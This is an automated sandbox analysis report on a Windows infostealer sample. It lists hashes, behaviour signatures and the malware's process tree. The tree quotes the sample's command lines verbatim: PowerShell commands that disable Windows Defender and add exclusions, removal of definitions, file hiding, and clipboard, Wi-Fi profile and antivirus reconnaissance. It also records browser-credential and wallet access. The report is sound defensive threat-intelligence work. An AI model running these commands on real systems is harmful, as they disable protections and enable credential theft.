Analysis
-
max time kernel
140s -
max time network
109s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
01-06-2024 08:27
Behavioral task
behavioral1
Sample
946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
Resource
win7-20240508-en
General
-
Target
946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe
-
Size
5.9MB
-
MD5
82783812e82bd062967d473332b45f93
-
SHA1
c7f991ed9a50a837e19c26fa3ef45ad24228495b
-
SHA256
946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a
-
SHA512
459b03f4f0342422144c08e81a9ee3c6940b4c894b7b5c7f42e37bd9fae81ba1015999574ab3a554a81466e7569d3e81aee11afc1d8f9bfcb9d3c5d6ee7d9c94
-
SSDEEP
98304:0rTzvMhjdOUei65sn6Wfz7pnxCMJk1JTxuZ3zEgyOFRyn26iI2kr2b4pnjZpbR:0rTY0DOYMJeJT44xn26T2CHnNVR
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 456 powershell.exe 532 powershell.exe 3312 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exeattrib.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Executes dropped EXE 1 IoCs
Processes:
rar.exepid process 1700 rar.exe -
Loads dropped DLL 17 IoCs
Processes:
946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exepid process 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI8842\python310.dll upx behavioral2/memory/540-25-0x00007FF947AD0000-0x00007FF947F32000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\libffi-7.dll upx behavioral2/memory/540-30-0x00007FF95A650000-0x00007FF95A674000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\_ssl.pyd upx behavioral2/memory/540-48-0x00007FF95E8C0000-0x00007FF95E8CF000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI8842\libcrypto-1_1.dll upx behavioral2/memory/540-54-0x00007FF957150000-0x00007FF95717C000-memory.dmp upx behavioral2/memory/540-57-0x00007FF95CA80000-0x00007FF95CA98000-memory.dmp upx behavioral2/memory/540-58-0x00007FF9573E0000-0x00007FF9573FE000-memory.dmp upx behavioral2/memory/540-60-0x00007FF947540000-0x00007FF9476B1000-memory.dmp upx behavioral2/memory/540-62-0x00007FF957130000-0x00007FF957149000-memory.dmp upx behavioral2/memory/540-64-0x00007FF95A620000-0x00007FF95A62D000-memory.dmp upx behavioral2/memory/540-66-0x00007FF957030000-0x00007FF95705E000-memory.dmp upx behavioral2/memory/540-71-0x00007FF9471C0000-0x00007FF947537000-memory.dmp upx behavioral2/memory/540-70-0x00007FF956E40000-0x00007FF956EF7000-memory.dmp upx behavioral2/memory/540-77-0x00007FF957300000-0x00007FF95730D000-memory.dmp upx behavioral2/memory/540-80-0x00007FF956670000-0x00007FF956788000-memory.dmp upx behavioral2/memory/540-79-0x00007FF95A650000-0x00007FF95A674000-memory.dmp upx behavioral2/memory/540-76-0x00007FF957290000-0x00007FF9572A5000-memory.dmp upx behavioral2/memory/540-75-0x00007FF947AD0000-0x00007FF947F32000-memory.dmp upx behavioral2/memory/540-277-0x00007FF957150000-0x00007FF95717C000-memory.dmp upx behavioral2/memory/540-302-0x00007FF9573E0000-0x00007FF9573FE000-memory.dmp upx behavioral2/memory/540-310-0x00007FF957130000-0x00007FF957149000-memory.dmp upx behavioral2/memory/540-318-0x00007FF947540000-0x00007FF9476B1000-memory.dmp upx behavioral2/memory/540-314-0x00007FF9471C0000-0x00007FF947537000-memory.dmp upx behavioral2/memory/540-313-0x00007FF956E40000-0x00007FF956EF7000-memory.dmp upx behavioral2/memory/540-304-0x00007FF95A650000-0x00007FF95A674000-memory.dmp upx behavioral2/memory/540-303-0x00007FF947AD0000-0x00007FF947F32000-memory.dmp upx behavioral2/memory/540-312-0x00007FF957030000-0x00007FF95705E000-memory.dmp upx behavioral2/memory/540-317-0x00007FF956670000-0x00007FF956788000-memory.dmp upx behavioral2/memory/540-339-0x00007FF9573E0000-0x00007FF9573FE000-memory.dmp upx behavioral2/memory/540-344-0x00007FF956E40000-0x00007FF956EF7000-memory.dmp upx behavioral2/memory/540-343-0x00007FF957030000-0x00007FF95705E000-memory.dmp upx behavioral2/memory/540-342-0x00007FF95A620000-0x00007FF95A62D000-memory.dmp upx behavioral2/memory/540-341-0x00007FF957130000-0x00007FF957149000-memory.dmp upx behavioral2/memory/540-340-0x00007FF947540000-0x00007FF9476B1000-memory.dmp upx behavioral2/memory/540-338-0x00007FF95CA80000-0x00007FF95CA98000-memory.dmp upx behavioral2/memory/540-337-0x00007FF957150000-0x00007FF95717C000-memory.dmp upx behavioral2/memory/540-336-0x00007FF95E8C0000-0x00007FF95E8CF000-memory.dmp upx behavioral2/memory/540-335-0x00007FF95A650000-0x00007FF95A674000-memory.dmp upx behavioral2/memory/540-334-0x00007FF947AD0000-0x00007FF947F32000-memory.dmp upx behavioral2/memory/540-333-0x00007FF956670000-0x00007FF956788000-memory.dmp upx behavioral2/memory/540-332-0x00007FF957300000-0x00007FF95730D000-memory.dmp upx behavioral2/memory/540-331-0x00007FF957290000-0x00007FF9572A5000-memory.dmp upx behavioral2/memory/540-330-0x00007FF9471C0000-0x00007FF947537000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 9 ip-api.com 32 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid process 3968 WMIC.exe 3444 WMIC.exe 812 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 452 tasklist.exe 1996 tasklist.exe 3860 tasklist.exe 3636 tasklist.exe 4904 tasklist.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4004 powershell.exe 456 powershell.exe 456 powershell.exe 4004 powershell.exe 4004 powershell.exe 456 powershell.exe 532 powershell.exe 532 powershell.exe 532 powershell.exe 4932 powershell.exe 4932 powershell.exe 4932 powershell.exe 3312 powershell.exe 3312 powershell.exe 3312 powershell.exe 2000 powershell.exe 2000 powershell.exe 1604 powershell.exe 1604 powershell.exe 1604 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 3516 powershell.exe 3516 powershell.exe 3516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exetasklist.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 2896 WMIC.exe Token: SeSecurityPrivilege 2896 WMIC.exe Token: SeTakeOwnershipPrivilege 2896 WMIC.exe Token: SeLoadDriverPrivilege 2896 WMIC.exe Token: SeSystemProfilePrivilege 2896 WMIC.exe Token: SeSystemtimePrivilege 2896 WMIC.exe Token: SeProfSingleProcessPrivilege 2896 WMIC.exe Token: SeIncBasePriorityPrivilege 2896 WMIC.exe Token: SeCreatePagefilePrivilege 2896 WMIC.exe Token: SeBackupPrivilege 2896 WMIC.exe Token: SeRestorePrivilege 2896 WMIC.exe Token: SeShutdownPrivilege 2896 WMIC.exe Token: SeDebugPrivilege 2896 WMIC.exe Token: SeSystemEnvironmentPrivilege 2896 WMIC.exe Token: SeRemoteShutdownPrivilege 2896 WMIC.exe Token: SeUndockPrivilege 2896 WMIC.exe Token: SeManageVolumePrivilege 2896 WMIC.exe Token: 33 2896 WMIC.exe Token: 34 2896 WMIC.exe Token: 35 2896 WMIC.exe Token: 36 2896 WMIC.exe Token: SeDebugPrivilege 452 tasklist.exe Token: SeDebugPrivilege 4004 powershell.exe Token: SeDebugPrivilege 456 powershell.exe Token: SeIncreaseQuotaPrivilege 2896 WMIC.exe Token: SeSecurityPrivilege 2896 WMIC.exe Token: SeTakeOwnershipPrivilege 2896 WMIC.exe Token: SeLoadDriverPrivilege 2896 WMIC.exe Token: SeSystemProfilePrivilege 2896 WMIC.exe Token: SeSystemtimePrivilege 2896 WMIC.exe Token: SeProfSingleProcessPrivilege 2896 WMIC.exe Token: SeIncBasePriorityPrivilege 2896 WMIC.exe Token: SeCreatePagefilePrivilege 2896 WMIC.exe Token: SeBackupPrivilege 2896 WMIC.exe Token: SeRestorePrivilege 2896 WMIC.exe Token: SeShutdownPrivilege 2896 WMIC.exe Token: SeDebugPrivilege 2896 WMIC.exe Token: SeSystemEnvironmentPrivilege 2896 WMIC.exe Token: SeRemoteShutdownPrivilege 2896 WMIC.exe Token: SeUndockPrivilege 2896 WMIC.exe Token: SeManageVolumePrivilege 2896 WMIC.exe Token: 33 2896 WMIC.exe Token: 34 2896 WMIC.exe Token: 35 2896 WMIC.exe Token: 36 2896 WMIC.exe Token: SeIncreaseQuotaPrivilege 3968 WMIC.exe Token: SeSecurityPrivilege 3968 WMIC.exe Token: SeTakeOwnershipPrivilege 3968 WMIC.exe Token: SeLoadDriverPrivilege 3968 WMIC.exe Token: SeSystemProfilePrivilege 3968 WMIC.exe Token: SeSystemtimePrivilege 3968 WMIC.exe Token: SeProfSingleProcessPrivilege 3968 WMIC.exe Token: SeIncBasePriorityPrivilege 3968 WMIC.exe Token: SeCreatePagefilePrivilege 3968 WMIC.exe Token: SeBackupPrivilege 3968 WMIC.exe Token: SeRestorePrivilege 3968 WMIC.exe Token: SeShutdownPrivilege 3968 WMIC.exe Token: SeDebugPrivilege 3968 WMIC.exe Token: SeSystemEnvironmentPrivilege 3968 WMIC.exe Token: SeRemoteShutdownPrivilege 3968 WMIC.exe Token: SeUndockPrivilege 3968 WMIC.exe Token: SeManageVolumePrivilege 3968 WMIC.exe Token: 33 3968 WMIC.exe Token: 34 3968 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 884 wrote to memory of 540 884 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe PID 884 wrote to memory of 540 884 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe PID 540 wrote to memory of 5060 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 5060 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 3696 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 3696 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 4756 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 4756 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 2752 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 2752 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 1836 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 1836 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 2752 wrote to memory of 452 2752 cmd.exe tasklist.exe PID 2752 wrote to memory of 452 2752 cmd.exe tasklist.exe PID 3696 wrote to memory of 4004 3696 cmd.exe powershell.exe PID 3696 wrote to memory of 4004 3696 cmd.exe powershell.exe PID 1836 wrote to memory of 2896 1836 cmd.exe WMIC.exe PID 1836 wrote to memory of 2896 1836 cmd.exe WMIC.exe PID 5060 wrote to memory of 456 5060 cmd.exe powershell.exe PID 5060 wrote to memory of 456 5060 cmd.exe powershell.exe PID 4756 wrote to memory of 4400 4756 cmd.exe mshta.exe PID 4756 wrote to memory of 4400 4756 cmd.exe mshta.exe PID 540 wrote to memory of 1016 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 1016 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 1016 wrote to memory of 4484 1016 cmd.exe reg.exe PID 1016 wrote to memory of 4484 1016 cmd.exe reg.exe PID 540 wrote to memory of 1660 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 1660 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 1660 wrote to memory of 4268 1660 cmd.exe reg.exe PID 1660 wrote to memory of 4268 1660 cmd.exe reg.exe PID 540 wrote to memory of 4356 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe netsh.exe PID 540 wrote to memory of 4356 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe netsh.exe PID 4356 wrote to memory of 3968 4356 cmd.exe WMIC.exe PID 4356 wrote to memory of 3968 4356 cmd.exe WMIC.exe PID 540 wrote to memory of 4992 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 4992 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 4992 wrote to memory of 3444 4992 cmd.exe WMIC.exe PID 4992 wrote to memory of 3444 4992 cmd.exe WMIC.exe PID 540 wrote to memory of 1764 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 1764 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 2924 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 2924 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 1764 wrote to memory of 4244 1764 cmd.exe attrib.exe PID 1764 wrote to memory of 4244 1764 cmd.exe attrib.exe PID 2924 wrote to memory of 532 2924 cmd.exe powershell.exe PID 2924 wrote to memory of 532 2924 cmd.exe powershell.exe PID 540 wrote to memory of 3260 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 3260 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 1220 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 1220 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 1220 wrote to memory of 1996 1220 cmd.exe tasklist.exe PID 1220 wrote to memory of 1996 1220 cmd.exe tasklist.exe PID 3260 wrote to memory of 3860 3260 cmd.exe tasklist.exe PID 3260 wrote to memory of 3860 3260 cmd.exe tasklist.exe PID 540 wrote to memory of 4352 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 4352 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 4640 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 4640 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 1568 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 1568 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 2936 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 2936 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 2276 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe PID 540 wrote to memory of 2276 540 946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe cmd.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 4244 attrib.exe 2176 attrib.exe 5044 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe"C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe"C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:456 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4004 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('enter the key', 0, 'key ', 32+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('enter the key', 0, 'key ', 32+16);close()"4⤵PID:4400
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:452 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2896 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4484
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:4268
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3968 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3444 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\946cad81db1d7f061cced089ccda7fc4fa2fca82e62e940348682da4cca3d24a.exe"4⤵
- Views/modifies file attributes
PID:4244 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:532 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3860 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:4352
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:4516
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵PID:2936
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4932 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4640
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3636 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1568
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4616
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵PID:2276
-
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵PID:4356
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:2192
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:876 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:888
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2652
-
